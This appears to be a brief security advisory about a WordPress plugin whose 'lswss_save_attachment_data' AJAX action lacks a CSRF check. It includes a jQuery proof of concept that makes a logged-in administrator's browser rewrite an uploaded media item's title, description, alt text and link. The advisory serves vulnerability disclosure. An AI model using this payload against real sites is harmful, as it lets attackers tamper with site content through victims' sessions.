The plugin does not have CSRF check in the lswss_save_attachment_data AJAX action, allowing attackers to make a logged in high privilege user, change title, description, alt text, and URL of arbitrary uploaded media.
jQuery.post(ajaxurl,{
action: "lswss_save_attachment_data",
attachment_id: 564,
form_data: "lswss_attachment_title=Test&lswss_attachment_desc=Changed%20via%20CSRF&lswss_attachment_alt=Alt%20text&lswss_attachment_link="
})